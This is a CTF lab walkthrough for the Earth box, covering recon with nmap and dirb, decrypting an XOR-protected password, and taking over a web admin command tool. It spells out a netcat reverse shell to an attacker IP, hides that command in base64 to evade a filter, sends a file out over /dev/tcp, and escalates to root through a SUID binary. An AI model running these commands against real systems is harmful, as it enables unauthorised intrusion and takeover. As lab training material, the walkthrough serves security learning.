Secuneus Labs – TryHackMe Walk-through : The Earth CTF Box

step 1 netdiscover -r 192.168.0.1/24 = (192.168.1.42). Use netdiscover command to find all the host/ip running around you.

step 2 find open ports and see if there is any vulnerability

nmap 192.168.1.42. Use nmap command to see which ports are open. You can see 3 ports are open (ssh,http,https)

Use “nmap -A 192.168.1.42” command to get all the info about the open ports.

Use “nmap -sV -O 192.168.1.42” to find the version of ports and the version of the operating system of target. It is found that the version of OS is os-linux 4-5

step 3 now see if there is any vulnerability of open ports present in scripts of nmap “/usr/share/nmap/scripts”

Use command “ls /usr/share/nmap/scripts | grep ssh” & “ls /usr/share/nmap/scripts | grep http” to find vulnerability about ssh and http protocol individually

Now use “nmap -p 80 –script=http-vuln* 192.168.1.42” to see if any vulnerability is exploitable. We find no vulnerability which is exploitable.

step 4 as the http and https protocol was open. So it means that some website is running. So try browsing the ip of target. browse http://192.168.1.40 or https://192.168.1.40. But some error messages show. It is 400 error which means that there is some problem at client side.

step 5 so let’s try to access directories of the ip to what problem are we facing “dirb http://192.168.1.40/ /usr/share/wordlists/dirb/common.txt” 

we found one directory “http://192.168.1.42/cgi-bin/” but found nothing in particular. So try the same with https but still no useful information. 

step 6 now if the target has a https website running so it will definitely have an ssl certificate. So try to see it. (click on lock icon, then on connection not secure, the on more information, and then on view certificate)

We found that it has 2 DNS names: DNS=earth.local & subdomain=terratest.earth.local.

step 7 now lets see if this dns exists in the website file so f kali

as there is no such file. So let’s add the dns and subdomain of website to /etc/hosts with command “echo “192.168.1.42 earth.local” >> /etc/hosts” and “echo “192.168.1.42 terratest.earth.local” >> /etc/hosts”

Check if both dns are add with command “cat /etc/hosts”

step 8 now as the dns are added so lets browse earth.local and terratest.earth.local. web page with some encrypted text and message box appears in both the cases

step 9 now lets again use dirb command to find the directories as there is a message column which means that login page must be there “dirb http://earth.local” 

we found the link to the admin page so let’s see what it is? We found a login page with username & password field. However when we do dirb https://earth.local and dirb http://terratest.earth.local we find the same result 

but when we do dirb https://terratest.earth.local we find two new pages.

When we browse https://terratest.earth.local/index.html we find nothing 

but when we browse https://terratest.earth.local/robots.txt. We find one suspicious fill Disallow: /testingnotes.*.

step 10 browse https://terratest.earth.local/testingnotes.txt.  A message appears which states that username is terra and encryption method = XOR & testdata.txt used for encryption. But where is

the encrypted data. See the first page of the website in step 8. There was some encrypted data on that page.

step 11 browse https://terratest.earth.local/testdata.txt to get the data used to decrypt.

browse https://gchq.github.io/CyberChef/ OR any other website to decrypt data = (use encryption method = XOR & put encryption key and data to decrypt) encrypted data is earthclimatechangebad4humans. It is a potential password to the login page. So login using username=terra and password=earthclimatechangebad4humans.

step 12 after login, Admin Command Tool is opened

step 13 let’s start by executing ls command

step 14 now check the operating system of the target using “uname -a” an see if we could find something to exploit it but nothing is found.(linux earth 5.12)

step 15 now check in which directory you are using pwd command. You are in the root directory. So now let’s start checking all the directories for clues.

We find a clue in the var directory named earth_web. Use commands “ls/var” and “ls/var/earth_web”. Here we found our user flag.

Step 16 uses the command “cat /var/earth_web/user_flag” to display the content of user_flag.txt. You got your first flag.

Now to find root flag we need root access.so we will try to get remote access of server

Step 17 uses the command “echo $SHELL” to check the current shell. You can see that you are in sbin shell. 

Now let’s check all the shells available in the server using command “cat /etc/shells”. These are needed to run netcat commands to make kali listening for the target to get remote access.

step 18  run command “nc -lnvp 4444” in kali to listen to the target. 

Now use command “nc -e /bin/bash 192.168.1.92 4444” on the server command line to connect the earth server to kali. But it is not working as remote connection is not allowed.

step 19  so let’s try to encode the command and use it again. Use “echo nc -e /bin/bash 192.168.1.92 4444 | base64” to encrypt the command.

Now force the earth server to run this decrypted command using code “echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS45MiA0NDQ0Cg== | base64 -d | bash” server will need to decode first then execute in the bash shell.

you do not get anything on the command line page but on the kali terminal you have remote access to the target.

step 20 now to confirm the command  “whoami” result will be apache that means remote access is successful.

Now we need to find the weak file which has the permission of root access to find those files using the command “find / -perm -u=s -type f 2>/dev/null”. you will see  different files which have root access. so try to exploit these files to get root access

step 21 we see one file which may be vulnerable. Lets see the command “ /usr/bin/reset_root” on the execution server is not allowing us to do anything.

step 22 so we will try to send this file to kali and check what the error is. Use command “nc -lnvp 3333 > reset_root” in kali to send the copy of the file to kali. 

To send the file from target acces use command “cat /usr/bin/reset_root > /dev/tcp/192.168.1.92 3333” (execute in remote control to send the file)

But before that use command “python3 -c ‘import pty;pty.spawn(“/bin/bash”)‘” to make our access interactive.

now run “cat /usr/bin/reset_root > /dev/tcp/192.168.1.92/3333”

step 23 we will get this file in kali. Now execute the “ls” command to see the file.

Read the file using command “cat reset_root” (you will see the content of the file which is not readable to us, so we will use the ltrace tool).

“ltrace ./reset_root” (for first time users, you will have to install this tool. after installing run it again)

but it shows permission denied so to give executable permission to ltrace use command “chmod +x reset_root”. now run command ltrace ./reset_root (it show that our remote accessed server is missing 3 files so use touch command to create these files in the remote accessed server)

Step 24 use following command to create the missing files 

“touch /dev/shm/kHgTFI5G”

“touch /dev/shm/Zw7bV9U5”

“touch /tmp/kcM0Wewe”

Use command “reset_root” to reset the password. (root password is reset to earth)

step 25 so lets change to root account by using command “su root”. fill the password… root access is gained

step 26 use “pwd” to see where you are. you are in the root directory. Now use the command “cd root” to get into /root. Do “ls” to view contents. you will find the root_flag.txt file and use command “cat root_flag.txt” to read the file. root flag is obtained.

This CTF walkthrough created by Nishtha Kumari